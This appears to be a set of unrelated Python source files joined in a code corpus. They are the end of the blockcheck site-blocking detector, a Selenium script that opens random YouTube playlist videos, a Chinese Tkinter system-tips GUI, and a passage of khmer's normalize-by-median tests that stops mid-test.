if not disable_report:
try:
report_request = urllib.request.urlopen(
'http://blockcheck.antizapret.prostovpn.org/postdata.php',
data=urllib.parse.urlencode({
"text": printed_text,
"text_debug": printed_text_with_debug if really_bad_fuckup else '',
}).encode('utf-8')
)
if (report_request):
report_request.close()
except urllib.error.URLError as e:
# keep it silent
pass
if ip_isp:
need_help_isp_list = _get_url(
"https://raw.githubusercontent.com/ValdikSS/blockcheck/master/we_need_your_help_isp_list.txt")
if need_help_isp_list[0] == 200:
need_help_isp_list = need_help_isp_list[1]
for need_help_isp in need_help_isp_list.split("\n"):
need_help_isp = need_help_isp.strip().lower()
if need_help_isp and need_help_isp in ip_isp[1].lower():
print()
print("[⚠] Нам нужна ваша помощь!\n",
"Пожалуйста, помогите собрать расширенные данные о вашем провайдере:\n",
"https://github.com/ValdikSS/blockcheck/wiki/Нужна-ваша-помощь"
)
def setup_args():
if getattr(sys, 'frozen', False):
os.environ['SSL_CERT_FILE'] = os.path.join(sys._MEIPASS, 'lib', 'ca-certificates.crt')
parser = argparse.ArgumentParser(description='Определитель типа блокировки сайтов у провайдера.')
parser.add_argument('--console', action='store_true', help='Консольный режим. Отключает Tkinter GUI.')
parser.add_argument('--no-report', action='store_true',
help='Не отправлять результат на сервер (отправляется только выводимый текст).')
parser.add_argument('--no-isup', action='store_true',
help='Не проверять доступность сайтов через {}.' \
.format(isup_server))
parser.add_argument('--force-dpi-check', action='store_true',
help='Выполнить проверку DPI, даже если провайдер не блокирует сайты.')
parser.add_argument('--disable-ipv6', action='store_true', help='Отключить поддержку IPv6.')
parser.add_argument('--force-ipv6', action='store_true', help='Игнорировать обнаружение туннелей.')
parser.add_argument('--debug', action='store_true', help='Включить режим отладки (и --no-report).')
parser.add_argument('--web', action='store_true', help='Веб-интерфейс.')
args = parser.parse_args()
if args.console:
global tkusable
tkusable = False
if args.no_isup:
global disable_isup
disable_isup = True
if args.no_report:
global disable_report
disable_report = True
if args.force_dpi_check:
global force_dpi_check
force_dpi_check = True
if args.disable_ipv6:
global disable_ipv6
disable_ipv6 = True
if args.force_ipv6:
global force_ipv6
force_ipv6 = True
if args.debug:
global debug
debug = True
disable_report = True
if args.web:
global web_interface
web_interface = True
return 0
if __name__ == "__main__":
# if getattr(sys, 'frozen', False):
# os.environ['SSL_CERT_FILE'] = os.path.join(sys._MEIPASS, 'lib', 'ca-certificates.crt')
#
# parser = argparse.ArgumentParser(description='Определитель типа блокировки сайтов у провайдера.')
# parser.add_argument('--console', action='store_true', help='Консольный режим. Отключает Tkinter GUI.')
# parser.add_argument('--no-report', action='store_true', help='Не отправлять результат на сервер (отправляется только выводимый текст).')
# parser.add_argument('--no-isup', action='store_true',
# help='Не проверять доступность сайтов через {}.' \
# .format(isup_server))
# parser.add_argument('--force-dpi-check', action='store_true', help='Выполнить проверку DPI, даже если провайдер не блокирует сайты.')
# parser.add_argument('--disable-ipv6', action='store_true', help='Отключить поддержку IPv6.')
# parser.add_argument('--force-ipv6', action='store_true', help='Игнорировать обнаружение туннелей.')
# parser.add_argument('--debug', action='store_true', help='Включить режим отладки (и --no-report).')
# parser.add_argument('--web', action='store_true', help='Веб-интерфейс.')
# args = parser.parse_args()
#
# if args.console:
# tkusable = False
#
# if args.no_isup:
# disable_isup = True
#
# if args.no_report:
# disable_report = True
#
# if args.force_dpi_check:
# force_dpi_check = True
#
# if args.disable_ipv6:
# disable_ipv6 = True
#
# if args.force_ipv6:
# force_ipv6 = True
#
# if args.debug:
# debug = True
# disable_report = True
#
# if args.web:
# web_interface = True
setup_args()
if tkusable:
root = tk.Tk()
root.title("BlockCheck")
root.protocol("WM_DELETE_WINDOW", tk_terminate)
text = ThreadSafeConsole(root, wrap=tk.WORD)
text.pack(expand=1, fill='both')
threading.Thread(target=main).start()
try:
root.mainloop()
except (KeyboardInterrupt, SystemExit):
os._exit(0)
else:
try:
main()
except (KeyboardInterrupt, SystemExit):
sys.exit(1)
|
good_mornings.py
|
import selenium
import glob
from numpy import arange
from random import sample
from sys import exit
from time import sleep
from progress.spinner import Spinner
from progress.bar import ChargingBar
from threading import Thread
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
def worker():
finish = False
sp = Spinner('Loading ')
cont = 0
while(not finish):
sleep(1)
cont +=1
if(cont == 60):
finish = True
sp.next()
return
class YouMotivate:
def __init__(self):
# UNCOMMENT FOR TEMPORAL BARS WHILE LOADING WITH 60 SECONDS TIME {
# print('Managing Firefox Info')
# t = Thread(target=worker)
# t.start()
# }
opts = Options()
# UNCOMMENT FOR adding firefox user info {
users = glob.glob(r"C:\Users\*")
print("PC USERS:")
users = [user.split("\\")[len(user.split("\\"))-1] for user in users]
print(users)
print("Choose one: ")
user = input()
if(not user in users):
print("That user does not exist")
exit()
binary = FirefoxBinary(r'C:\Program Files\Mozilla Firefox\firefox.exe')
profiles = glob.glob('C:\\Users\\'+str(user)+'\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*')
profiles = [profile.split("\\")[len(profile.split("\\"))-1] for profile in profiles]
print("choose profile (normally the one with default-release): ")
print(profiles)
profile = input()
if(not profile in profiles):
print("That profile does not exist")
exit()
fp = ('C:\\Users\\'+str(user)+'\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\'+str(profile))
opts.profile = fp
# }
self.driver = webdriver.Firefox(options=opts,
executable_path='geckodriver')
print('Firefox Info Loaded succesfully')
print('Opening Youtube...')
self.driver.get("https://www.youtube.com/playlist?list=FLHcrPEhUkZW37RI7c5FQvtw")
sleep(4)
#get num of videos in the list
num = self.driver.find_element_by_xpath('/html/body/ytd-app/div/ytd-page-manager/ytd-browse/ytd-playlist-sidebar-renderer/div/ytd-playlist-sidebar-primary-info-renderer/div[1]/yt-formatted-string[1]')
num = int(num.text.split(' ')[0])
# print('NUM OF VIDEOS:\t' + str(num))
vids = sample(list(arange(1,num+1)), 3)
# print('CHOOSEN:\t' + str(vids))
#choose those videos and open it in new tabs
bar = ChargingBar(' Opening videos', max=len(vids))
for i in vids:
vid_ref = self.driver.find_element_by_xpath('/html/body/ytd-app/div/ytd-page-manager/ytd-browse/ytd-two-column-browse-results-renderer/div[1]/ytd-section-list-renderer/div[2]/ytd-item-section-renderer/div[3]/ytd-playlist-video-list-renderer/div[3]/ytd-playlist-video-renderer['+str(i)+']/div[2]/a')
ref = vid_ref.get_attribute("href")
# print(ref)
self.driver.execute_script("window.open('"+str(ref)+"', 'new_window_"+str(i)+"')")
# self.driver.execute_script('browser.tabs.create({url:"'+str(ref)+'"});')
bar.next()
bar.finish()
ym = YouMotivate()
exit()
|
Main.py
|
#coding:utf-8
#! /usr/bin/env python
#Author:Sh4d0w_小白
from tkinter import *
from Content import *
from threading import Thread
window = Tk()
checkButton = []
boxButton = []
var = []
var.append(IntVar())
pageNum = round(len(checkButtonText) / 9)
pageIndex = 1
treasureBox = Toplevel()
max = 0
def Init():
global x,y
treasureBox.withdraw()
#初始化窗体
window.title("网络安全技巧") #标题
treasureBox.title("百宝箱")#百宝箱
#窗体位置设置
screenWidth = window.winfo_screenwidth()
screenHeight = window.winfo_screenheight()
x = int((screenWidth - 800) / 2)
y = int((screenHeight - 600) / 2)
window.geometry("%sx%s+%s+%s" % (800, 600, x, y))
window.resizable(0, 0)
treasureBox.geometry("%sx%s+%s+%s" % (800, 600, x, y))
treasureBox.resizable(0, 0)
def MainContainer():
global max
#复选框
if (pageIndex * 9 + 1 > len(checkButtonText)):
max = len(checkButtonText)
else:
max = pageIndex * 9
for i in range((pageIndex - 1) * 9, max):
var.append(IntVar())
checkButton.append(Checkbutton(window, text = checkButtonText[i], variable = var[i + 1], height = 3, justify = LEFT))
if (i - (pageIndex - 1) * 9) / 3 < 1:
checkButton[i].grid(row = 1, column = i % 3, padx = 50, pady = 50, sticky = W)
elif (i - (pageIndex - 1) * 9) / 3 < 2:
checkButton[i].grid(row = 2, column = i % 3, padx = 50, pady = 50, sticky = W)
elif (i - (pageIndex - 1) * 9) / 3 < 3:
checkButton[i].grid(row = 3, column = i % 3, padx = 50, pady = 50, sticky = W)
def GetFunction(i):
return checkButtonFunction[i]()
#按钮
def Work():
if pageIndex == pageIndex:
for i in range((pageIndex - 1) * 9, max):
if var[i + 1].get() == 1:
GetFunction(i)
IsOk()
Do = Button(window, text = "优化", command = lambda:ThreadTask(Work), width = 10)
Do.place(x = 335, y = 520)
#推荐
def Recommend():
if var[0].get() == 1:
if pageIndex == 1:
for i in range(0,9):
checkButton[i].select()
checkButton[4].deselect()
else:
for i in range((pageIndex - 1) * 9, len(checkButton)):
checkButton[i].select()
else:
for i in range(len(checkButton)):
checkButton[i].deselect()
recommend = Checkbutton(window, text = "推荐", variable = var[0], command = lambda:ThreadTask(Recommend))
recommend.place(x = 50, y = 520)
def CleanGrid():
global checkButton,recommend
recommend.deselect()
for i in range(len(checkButton)):
checkButton[i].deselect()
checkButton[i].grid_forget()
def NextPage(event):
global pageIndex
if pageIndex < pageNum:
pageIndex += 1
CleanGrid()
MainContainer()
def PrevPage(event):
global pageIndex
if pageIndex > 1:
pageIndex -= 1
CleanGrid()
MainContainer()
def PageControl():
cickLabel = Label(window,text = "下一页")
cickLabel2 = Label(window,text = "上一页")
cickLabel.bind('<Button-1>', NextPage)
cickLabel2.bind('<Button-1>', PrevPage)
cickLabel.place(x = 695, y = 520)
cickLabel2.place(x = 625, y = 520)
def Exit():
def JieShu():
window.destroy()
sys.exit(0)
def Hidden():
treasureBox.withdraw()
window.protocol("WM_DELETE_WINDOW", JieShu)
treasureBox.protocol("WM_DELETE_WINDOW", Hidden)
#版本号
version = Label(window, text = "版本:3.5.4.4")
version.place(x = 0, y = 575)
def GetFunction2(i):
return treasureBoxFunction[i]
def TreasureBox():
j = 0
for i in range(len(treasureBoxText)):
boxButton.append(Button(treasureBox, text = treasureBoxText[i], height = 2, width = 18, justify = CENTER, wraplength=100, command = GetFunction2(i)))
if round(i / 3) == j:
boxButton[i].grid(row = j, column = i % 3, padx = 50, pady = 20, sticky = W)
else:
boxButton[i].grid(row = j, column = 3, padx = 50, pady = 20, sticky = W)
j += 1
treasureBox.deiconify()
Button(window, text = "百宝箱", command = lambda:ThreadTask(TreasureBox)).place(x = 725, y = 555)
def ThreadTask(task): #防止阻塞GUI
t = Thread(target = task)
t.setDaemon(True)
t.start()
if __name__ == "__main__":
Init()
PageControl()
MainContainer()
Exit()
window.mainloop()
|
test_normalize_by_median.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2015-2016, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=missing-docstring,invalid-name
import os
import threading
import io
import shutil
import screed
import khmer
import pytest
from . import khmer_tst_utils as utils
from .test_scripts import _make_counting
def test_normalize_by_median_indent():
infile = utils.get_test_data('paired-mixed.fa.pe')
hashfile = utils.get_test_data('normC20k20.ct')
outfile = utils.get_temp_filename('paired-mixed.fa.pe.keep')
script = 'normalize-by-median.py'
args = ['--loadgraph', hashfile, '-o', outfile, infile]
(status, out, err) = utils.runscript(script, args)
assert status == 0, (out, err)
assert os.path.exists(outfile)
def test_normalize_by_median_loadgraph_with_args():
infile = utils.get_test_data("test-abund-read-2.fa")
tablefile = utils.get_temp_filename("table")
in_dir = os.path.dirname(tablefile)
script = "load-into-counting.py"
args = [tablefile, infile]
(_, _, err) = utils.runscript(script, args)
script = "normalize-by-median.py"
args = ["--ksize", "7", "--loadgraph", tablefile, infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'WARNING: You are loading a saved k-mer countgraph from' in err, err
def test_normalize_by_median_empty_file():
infile = utils.copy_test_data('empty-file')
script = 'normalize-by-median.py'
in_dir = os.path.dirname(infile)
args = [infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'WARNING:' in err, err
assert 'is empty' in err, err
assert 'SKIPPED' in err, err
def test_normalize_by_median():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 98' in err, err
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert "I/O Errors" not in err
def test_normalize_by_median_quiet():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '--quiet', '-M', '2e6', infile]
(_, out, err) = utils.runscript(script, args, in_dir)
assert len(out) == 0, out
assert len(err) < 460, len(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert "I/O Errors" not in err
def test_normalize_by_median_unpaired_final_read():
CUTOFF = '1'
infile = utils.copy_test_data('single-read.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-p', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "ERROR: Unpaired reads when require_paired" in err, err
def test_normalize_by_median_sanity_check_0():
infile = utils.copy_test_data('single-read.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-U', '1024', '--max-mem', '60', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0, status
assert "recommended false positive ceiling of 0.1!" in err, err
def test_normalize_by_median_sanity_check_1():
infile = utils.copy_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-U', '83', '--max-tablesize', '17', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "Warning: The given tablesize is too small!" in err, err
def test_normalize_by_median_sanity_check_2():
infile = utils.copy_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-U', '83', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "*** INFO: set memory ceiling automatically." in err, err
assert "*** Ceiling is: 1e+06 bytes" in err, err
def test_normalize_by_median_sanity_check_3():
infile = utils.copy_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
tablefile = utils.get_temp_filename('table', in_dir)
script = 'normalize-by-median.py'
args = ['-s', tablefile, '-U', '83', '--fp-rate', '0.7', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "Overriding default fp 0.1 with new fp: 0.7" in err, err
args = ['--loadgraph', tablefile, '-U', '83', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "WARNING: You have asked that the graph size be auto" in err, err
assert "NOT be set automatically" in err, err
assert "loading an existing graph" in err, err
def test_normalize_by_median_unforced_badfile():
CUTOFF = '1'
infile = utils.get_temp_filename("potatoes")
outfile = infile + '.keep'
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "ERROR: [Errno 2] No such file or directory:" in err, err
if os.path.exists(outfile):
assert False, '.keep file should have been removed: '
def test_normalize_by_median_contradictory_args():
infile = utils.copy_test_data('test-large.fa')
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '--force_single', '-p', '-R',
outfile, infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "cannot both be set" in err, err
def test_normalize_by_median_stdout_3():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile, '--out', '-']
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 98' in err, err
assert 'in block device' in err, err
assert "I/O Errors" not in err
@pytest.mark.known_failing
def test_normalize_by_median_known_good():
CUTOFF = '2'
infile = utils.copy_test_data('100k-filtered.fa.gz')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '20', '-x', '4e6', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
iter_known = screed.open(utils.get_test_data('100k-filtered.fa.keep.gz'))
iter_out = screed.open(outfile)
for rknown, rout in zip(iter_known, iter_out):
assert rknown.name == rout.name
def test_normalize_by_median_report_fp():
# this tests basic reporting of diginorm stats => report.out, including
# a test of aggregate stats for two input files.
infile = utils.copy_test_data("test-abund-read-2.fa")
infile2 = utils.copy_test_data("test-abund-read-2.fa", "copyDataTwo")
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '-R', outfile, infile, infile2]
utils.runscript(script, args, in_dir)
assert os.path.exists(outfile)
report = open(outfile, 'r')
line = report.readline().strip()
assert line == 'total,kept,f_kept', line
line = report.readline().strip()
assert line == '1001,1,0.000999', line
line = report.readline().strip()
assert line == '2002,1,0.0004995', line
def test_normalize_by_median_report_fp_hifreq():
# this tests high-frequency reporting of diginorm stats for a single
# file => report.out.
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '-R', outfile, infile,
'--report-frequency', '100']
utils.runscript(script, args, in_dir)
assert os.path.exists(outfile)
report = open(outfile, 'r')
line = report.readline().strip()
assert line == 'total,kept,f_kept', line
line = report.readline().strip()
assert line == '100,1,0.01', line
line = report.readline().strip()
assert line == '200,1,0.005', line
@pytest.mark.huge
def test_normalize_by_median_report_fp_huge():
# this tests reporting of diginorm stats => report.out for a large
# file, with the default reporting interval of once every 100k.
infile = utils.copy_test_data('test-large.fa')
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '-R', outfile, infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "fp rate estimated to be 0.623" in err, err
report = open(outfile, 'r')
line = report.readline() # skip header
line = report.readline()
assert "100000,25261,0.2526" in line, line
def test_normalize_by_median_unpaired_and_paired():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-paired.fa')
in_dir = os.path.dirname(infile)
unpairedfile = utils.copy_test_data('random-20-a.fa')
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-u', unpairedfile, '-p', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 4061' in err, err
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
def test_normalize_by_median_count_kmers_PE():
CUTOFF = '1'
infile = utils.copy_test_data('paired_one.base.dif.fa')
in_dir = os.path.dirname(infile)
# The test file has one pair of identical read except for the last base
# The 2nd read should be discarded in the unpaired mode
# but kept in the paired end mode adding only one more unique kmer
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '--force_single', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 98' in err, err
assert 'kept 1 of 2 or 50.0%' in err, err
args = ['-C', CUTOFF, '-k', '17', '-p', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 99' in err, err
assert 'kept 2 of 2 or 100.0%' in err, err
def test_normalize_by_median_double_file_name():
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = [utils.get_test_data('test-abund-read-2.fa'), infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "Duplicate filename--Cannot handle this!" in err, err
def test_normalize_by_median_stdin_no_out():
infile = utils.get_temp_filename('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ["-"]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "Accepting input from stdin; output filename" in err, err
def test_normalize_by_median_overwrite():
outfile = utils.copy_test_data('test-abund-read.fa')
in_dir = os.path.dirname(outfile)
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-3.fa')
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-o', outfile, infile]
utils.runscript(script, args, in_dir)
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert 'GACAGCgtgCCGCA' in seqs[0], seqs
def test_normalize_by_median_version():
script = 'normalize-by-median.py'
args = ['--version']
_, _, err = utils.runscript(script, args)
errlines = err.splitlines()
for err in errlines:
if err.startswith('||') or \
not err.strip():
continue
break
print(errlines)
print(err)
assert err.startswith('khmer ')
def test_normalize_by_median_2():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 2, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert seqs[1] == 'GGTTGACGGGGCTCAGGG', seqs
def test_normalize_by_median_paired():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-paired.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-p', '-k', '17', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 2, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert seqs[1].startswith('GGTTGACGGGGCTCAGGG'), seqs
def test_normalize_by_median_paired_fq():
CUTOFF = '20'
infile = utils.copy_test_data('test-abund-read-paired.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-p', '-k', '17', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 6, len(seqs)
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert seqs[1].startswith('GGTTGACGGGGCTCAGGG'), seqs
names = [r.name for r in screed.open(outfile)]
assert len(names) == 6, names
assert '895:1:37:17593:9954 1::FOO' in names, names
assert '895:1:37:17593:9954 2::FOO' in names, names
def test_normalize_by_median_impaired():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-impaired.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-p', '-k', '17', infile]
status, _, err = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert 'ERROR: Unpaired reads ' in err, err
def test_normalize_by_median_force():
CUTOFF = '1'
corrupt_infile = utils.copy_test_data('test-error-reads.fq')
good_infile = utils.copy_test_data('test-fastq-reads.fq')
in_dir = os.path.dirname(good_infile)
script = 'normalize-by-median.py'
args = ['-f', '-C', CUTOFF, '-k', '17', corrupt_infile, good_infile]
_, _, err = utils.runscript(script, args, in_dir)
assert '*** Skipping' in err
assert '** I/O Errors' in err
def test_normalize_by_median_no_bigcount():
infile = utils.copy_test_data("test-abund-read-2.fa")
hashfile = utils.get_temp_filename('test-out.ct')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
# 256 is outside the range of valid values for C
args = ['-C', '256', '-k 8', '--savegraph', hashfile, infile]
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status == 1, (out, err)
assert "ERROR: khmer only supports 0 <= cutoff < 256" in err
print((out, err))
def test_normalize_by_median_empty():
CUTOFF = '1'
infile = utils.copy_test_data('test-empty.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
def test_normalize_by_median_emptycountgraph():
CUTOFF = '1'
infile = utils.copy_test_data('test-empty.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '--loadgraph', infile, infile]
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert 'ValueError' in err, (status, out, err)
def test_normalize_by_median_fpr():
MAX_TABLESIZE_PARAM = 12
infile = utils.copy_test_data('test-fastq-reads.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-f', '-k 17', '-x ' + str(MAX_TABLESIZE_PARAM), infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert os.path.exists(infile + '.keep'), infile
assert '** ERROR: the graph structure is too small' in err, err
def write_by_chunks(infile, outfile, CHUNKSIZE=8192):
ifile = io.open(infile, 'rb')
ofile = io.open(outfile, 'wb')
chunk = ifile.read(CHUNKSIZE)
while len(chunk) > 0:
ofile.write(chunk)
chunk = ifile.read(CHUNKSIZE)
ifile.close()
ofile.close()
def test_normalize_by_median_streaming_0():
CUTOFF = '20'
infile = utils.get_test_data('100-reads.fq.gz')
in_dir = os.path.dirname(infile)
fifo = utils.get_temp_filename('fifo')
outfile = utils.get_temp_filename('outfile')
# Use a fifo to copy stdout to a file for checking
os.mkfifo(fifo)
thread = threading.Thread(target=write_by_chunks, args=(fifo, outfile))
thread.start()
# Execute diginorm
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-o', fifo, infile]
utils.runscript(script, args, in_dir)
# Merge the thread
thread.join()
assert os.path.exists(outfile), outfile
with open(outfile) as fp:
linecount = sum(1 for _ in fp)
assert linecount == 400
def test_normalize_by_median_streaming_1():
CUTOFF = '20'
infile = utils.get_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
fifo = utils.get_temp_filename('fifo')
outfile = utils.get_temp_filename('outfile')
# Use a fifo to copy stdout to a file for checking
os.mkfifo(fifo)
thread = threading.Thread(target=write_by_chunks, args=(infile, fifo))
thread.start()
# Execute diginorm
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-o', outfile, fifo]
(_, _, err) = utils.runscript(script, args, in_dir)
# Merge the thread
thread.join()
assert os.path.exists(outfile), outfile
assert 'Total number of unique k-mers: 98' in err, err
assert 'fifo is empty' not in err, err
def test_diginorm_basic_functionality_1():
# each of these pairs has both a multicopy sequence ('ACTTCA...') and
# a random sequence. With 'C=1' and '-p', all should be kept.
CUTOFF = ['-C', '1']
PAIRING = ['-p']
infile = utils.copy_test_data('dn-test-all-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/1', 'b/2',
'c/1', 'c/2',
'd/1', 'd/2']), seqs
def test_diginorm_basic_functionality_2():
# each of these pairs has both a multicopy sequence ('ACTTCA...')
# and a random sequence ('G...'). With 'C=1' and '--force-
# single', only random seqs should be kept, together with one copy
# of the multicopy sequence.
CUTOFF = ['-C', '1']
PAIRING = ['--force_single']
infile = utils.copy_test_data('dn-test-all-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/2',
'c/1',
